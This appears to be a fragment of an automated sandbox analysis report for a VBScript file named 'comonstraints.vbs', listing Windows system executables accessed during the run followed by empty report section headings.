file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

comonstraints.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All